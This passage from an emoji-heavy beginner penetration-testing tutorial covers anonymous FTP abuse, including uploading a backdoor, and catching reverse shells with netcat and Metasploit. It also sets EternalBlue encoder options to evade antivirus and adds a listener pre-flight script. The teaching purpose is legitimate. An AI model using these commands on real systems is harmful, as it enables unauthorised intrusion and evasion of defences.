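    tried: Dict[str, Set[str]] = defaultdict(set)
    alerts: Dict[str, Alert] = {}
    for ts, ip, user, accepted in sorted(events):
        if accepted:
            if ip in alerts:
                alerts[ip].succeeded_after = True
            continue
        q = recent[ip]
        q.append(ts)
        tried[ip].add(user)
        while ts - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alert = alerts.setdefault(ip, Alert(ip, 0, []))
            alert.failures = max(alert.failures, len(q))
            alert.usernames = sorted(tried[ip])
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_sshd(SAMPLE_AUTH_LOG)).values():
        print(f"{alert.ip}: {alert.failures} failures, users {alert.usernames}, "
              f"logged in afterwards: {alert.succeeded_after}")
```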
SSH gives us direct command-line access, but sometimes we need to look at file transfer services as well. FTP services are often overlooked but can provide excellent opportunities for gaining access or escalating privileges! 📁
3. Exploiting FTP Services 📁
FTP services often have misconfigurations or allow anonymous access.
Anonymous FTP Access:
```bash
# Check for anonymous access
ftp 192.168.1.200
```
Anonymous FTP output:
```text
Connected to 192.168.1.200.
220 (vsFTPd 2.3.4)
Name (192.168.1.200:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```
```text
# If successful:
ftp> ls
ftp> pwd
ftp> cd /var/ftp/pub
ftp> get interesting_file.txt
ftp> put backdoor.php # If write access is allowed
```
FTP directory listing:
```text
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 0 65534 4096 Mar 17 2010 writable
226 Directory send OK.
ftp> cd writable
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
13 bytes sent in 0.00 secs (127.0781 kB/s)
ftp>
```
Setting Up Listeners and Catching Shells 🎣
Many exploits require a listener to catch reverse shells. Here are common methods:
🤓 Understanding Shells and Listeners
What is a Shell? 🐚 A shell is like a command prompt or terminal - it’s a text-based interface where you can type commands to control a computer. When we “get a shell” on a target system, we’re essentially getting a command line interface that lets us control that computer remotely!
What’s the Difference Between Reverse and Bind Shells? 🔄
Reverse Shell (Target calls you):
- Imagine you’re waiting by your phone, and the target computer calls YOU
- The target connects back to your computer
- Like saying “Hey target, when you get hacked, call me at this number!”
Bind Shell (You call the target):
- Imagine the target computer opens a phone line and waits for you to call
- You connect to the target computer
- Like saying “Hey target, answer the phone when I call you!”
What is a Listener? 👂 A listener is like sitting by the phone waiting for a call. Your computer “listens” on a specific port (phone number) for incoming connections from compromised systems. When an exploit succeeds, the target system “calls” your listener and establishes a connection!
🔧 What is Netcat?
Netcat is like the Swiss Army knife of networking! It’s a simple but powerful tool that can:
- Set up listeners (wait for connections)
- Make connections to other systems
- Transfer files
- Create basic backdoors
Think of it as a universal adapter that can connect to almost anything network-related!
Netcat Listener
```bash
# Basic listener
nc -lvnp 4444
```
Netcat listener ready:
```text
listening on [any] 4444 ...
```
Metasploit Multi/Handler
```text
msfconsole
use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit -j # Run as a job
```
Multi/handler output:
```text
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] Starting the payload handler...
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Command shell session 1 opened (192.168.1.50:4444 -> 192.168.1.200:54321) at 2024-01-15 10:50:23 -0500
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux/x86 192.168.1.50:4444 -> 192.168.1.200:54321 (192.168.1.200)
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
```
Now that we understand how to set up listeners and catch shells, let’s talk about the different types of payloads you can use. Choosing the right payload for your situation can make the difference between success and failure! 🎯
Understanding Payload Types 🎯
When exploiting, you’ll encounter different payload types:
Reverse Shell: Target connects back to you
- ✅ Pros: Bypasses most firewalls
- ❌ Cons: Requires your IP to be reachable
Bind Shell: Opens a port on the target
- ✅ Pros: No need for target to reach you
- ❌ Cons: Often blocked by firewalls
Meterpreter: Advanced payload with many features
- ✅ Pros: Encrypted, feature-rich
- ❌ Cons: More likely to be detected by AV
🤓 What is Meterpreter? Meterpreter is like the “luxury model” of shells! While a basic shell gives you a simple command line, Meterpreter is like having a full toolkit with advanced features. It can take screenshots, record keystrokes, pivot to other systems, and much more. Think of it as the difference between a basic walkie-talkie and a high-tech smartphone!
🤓 What is Antivirus (AV)? Antivirus software is like a security guard for your computer. It watches for suspicious activity and known malicious programs. Advanced payloads like Meterpreter are more likely to be recognized and blocked by these digital security guards, which is why sometimes simpler is better for staying undetected!
Great! Now that we understand the tools and techniques, let’s talk about how to use them effectively. Even with the best tools, exploitation can be tricky, so here are some hard-earned lessons from the field! 💡
Best Practices During Exploitation 🌟
Start Simple: Try default credentials before complex exploits - they work more often than you’d think! 😊
Document Everything: Keep detailed notes of what worked and what didn’t. Future you will thank present you! 📝
Be Patient: Exploits can fail for various reasons. Don’t get discouraged - troubleshoot systematically and try different approaches. 🧘♂️
Check Your Listeners: Always ensure your listener is running before launching exploits. It’s embarrassing when an exploit works but you’re not listening! 🤦♂️
Verify Access: Always confirm you have the access level you expected. Sometimes you get more (or less) than anticipated. 🔍
Even with the best preparation and following all the best practices, things can still go wrong. Don’t worry - this is completely normal! Exploitation often involves trial and error. Let’s look at the most common issues you’ll encounter and how to fix them. 🔧
Troubleshooting Common Issues 🛠️
Exploit Fails to Run
- Verify the target is actually vulnerable (double-check with scanners)
- Check if the service is running (maybe it restarted?)
- Ensure network connectivity (can you ping the target?)
- Try different payload types or exploit variations
No Shell Received 😞
- Confirm your IP is correct in LHOST (check with `ip addr` or `ifconfig`)
- Check firewall rules on both sides (are ports blocked?)
- Try different ports like 443, 8080, or 8443 (they’re often allowed through firewalls)
- Use a different payload type (sometimes a bind shell works when a reverse shell doesn’t)
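The two most common causes in this list (a wrong LHOST and a handler that was never started) are both things you can verify on your own machine before launching anything. The following is an added example, not code from the original post: a small Python pre-flight check that cross-references the LHOST/LPORT you intend to set against the output of `ip addr` and `ss -ltn`. The sample outputs below are constructed to match the shape of those commands and are not captured from a real system; on a real box you would feed it `subprocess.run(["ip", "addr"], ...)` output instead.

```python
import re

# Constructed sample output in the shape of `ip addr` (not from a real system).
SAMPLE_IP_ADDR = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:aa:bb:cc brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.10/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    inet 10.10.14.7/23 scope global tun0
       valid_lft forever preferred_lft forever
"""

# Constructed sample output in the shape of `ss -ltn` (listening TCP sockets).
SAMPLE_SS_LTN = """\
State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port  Process
LISTEN  0       128            0.0.0.0:22           0.0.0.0:*
LISTEN  0       128          127.0.0.1:5432         0.0.0.0:*
LISTEN  0       10        192.168.56.10:4444         0.0.0.0:*
"""


def local_ipv4_addresses(ip_addr_output: str) -> dict[str, str]:
    """Map every IPv4 address found in `ip addr` output to its interface name."""
    result = {}
    iface = None
    for line in ip_addr_output.splitlines():
        # Interface header lines look like "2: eth0: <FLAGS> ..."
        m = re.match(r"^\d+:\s+([^:@]+)[@:]", line)
        if m:
            iface = m.group(1)
            continue
        # Address lines look like "    inet 192.168.56.10/24 ..." (inet6 lines are skipped)
        m = re.match(r"^\s+inet\s+(\d+\.\d+\.\d+\.\d+)/\d+", line)
        if m and iface:
            result[m.group(1)] = iface
    return result


def listening_tcp(ss_output: str) -> set[tuple[str, int]]:
    """Return (address, port) pairs that are in LISTEN state in `ss -ltn` output."""
    socks = set()
    for line in ss_output.splitlines():
        fields = line.split()
        if not fields or fields[0] != "LISTEN":
            continue  # header line or non-listening socket
        addr, _, port = fields[3].rpartition(":")  # "Local Address:Port" column
        socks.add((addr, int(port)))
    return socks


def preflight(lhost: str, lport: int, ip_addr_output: str, ss_output: str) -> list[str]:
    """Return a list of problems with the planned LHOST/LPORT; empty means it looks ready."""
    problems = []
    addrs = local_ipv4_addresses(ip_addr_output)
    if lhost not in addrs:
        known = ", ".join(f"{a} ({i})" for a, i in addrs.items())
        problems.append(f"LHOST {lhost} is not assigned to any local interface; local addresses: {known}")
    bound = {addr for addr, port in listening_tcp(ss_output) if port == lport}
    if not bound:
        problems.append(f"nothing is listening on TCP port {lport}; start the handler first")
    elif lhost not in bound and "0.0.0.0" not in bound and "*" not in bound:
        problems.append(f"port {lport} is bound to {sorted(bound)}, not to LHOST {lhost}")
    return problems


if __name__ == "__main__":
    for host, port in [("192.168.56.10", 4444), ("10.10.14.7", 4444), ("172.16.0.1", 443)]:
        issues = preflight(host, port, SAMPLE_IP_ADDR, SAMPLE_SS_LTN)
        print(f"{host}:{port} ->", "OK" if not issues else "; ".join(issues))
```

The check for a handler bound to a different interface than LHOST (the 10.10.14.7 case above) catches a classic mistake: the listener is up, the IP is one of yours, but the target’s callback arrives on an interface nobody is listening on.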
Connection Drops Immediately 📉
- The exploit worked but something killed the session (AV, IDS, or timeout)
- Try a different payload (maybe something more stealthy)
- Check for antivirus or intrusion detection systems
- Use encoding options in Metasploit to evade detection
Example of using encoders:
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set ENCODER x64/xor_dynamic
msf6 exploit(windows/smb/ms17_010_eternalblue) > set ITERATIONS 3
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
```
🤓 What are Encoders? Encoders are like disguises for your exploit code! They scramble or “encode” your payload to make it look different, helping it sneak past antivirus software and security systems. It’s like putting on a fake mustache and glasses to avoid being recognized. The `ITERATIONS` setting is like putting on multiple disguises - the more iterations, the better the disguise, but it also makes the payload larger!
Don’t get discouraged if you encounter these issues - they’re part of the learning process! The more you practice, the better you’ll become at diagnosing and fixing problems. Remember, even experienced penetration testers run into these same issues regularly. 😊
What’s Next? 🚀
Congratulations! You’ve now learned the basics of exploitation. You should be able to:
- Identify and exploit common vulnerabilities like EternalBlue and Shellshock
- Use Metasploit for automated exploitation
- Set up listeners and handle reverse shells
- Troubleshoot common exploitation issues like a pro! 💪
In the next part of this series, we’ll cover Post-Exploitation techniques, including privilege escalation methods, maintaining persistence, lateral movement through networks, and data exfiltration techniques. That’s where the real fun begins! 🎭
🤓 What’s Post-Exploitation? Post-exploitation is what happens AFTER you’ve successfully gained access to a system. It’s like getting inside a building - now what do you do? Post-exploitation techniques include:
- Privilege Escalation: Getting higher-level access (like going from being a “guest” to becoming an “administrator”)
- Maintaining Persistence: Making sure you can get back in later (like hiding a spare key)
- Lateral Movement: Moving from one system to other connected systems (like exploring different rooms in the building)
- Data Exfiltration: Carefully gathering and removing important information (like a spy collecting intelligence)
But before you move on to post-exploitation, it’s crucial to get hands-on practice with these exploitation techniques. Theory is important, but there’s no substitute for actually running these commands and seeing the results! Let’s look at some safe, legal environments where you can practice. 🏆
Practice Resources 📚
To safely practice these techniques, check out these awesome resources:
Metasploitable 2 & 3: Intentionally vulnerable Linux distributions - perfect for beginners! 🎯
DVWA: Damn Vulnerable Web Application - great for web app testing 🌐
HackTheBox: Online platform with realistic targets - join the community! 🏆
TryHackMe: Guided learning with practice boxes - excellent tutorials 🎓
VulnHub: Free vulnerable VMs for practice - download and hack away! 💻
These practice environments are invaluable for building your skills in a safe, controlled setting. Start with the easier ones like DVWA and TryHackMe, then work your way up to more challenging platforms like HackTheBox. Remember, the goal is to learn and improve, not to rush through everything! 🎯
Final Thoughts 💭
Remember, ethical hacking is about improving security, not causing harm. The techniques you’ve learned here are powerful tools that should be used responsibly. Always ensure you have proper authorization before testing any system, and use these skills to make the digital world more secure! 🛡️
The cybersecurity community is incredibly welcoming and supportive. Don’t hesitate to ask questions, share your findings, and help others learn. We’re all in this together! 🤝
Happy hacking, and see you in the next post on post-exploitation techniques! 🎉
Stay curious, stay ethical, and keep learning! 🌟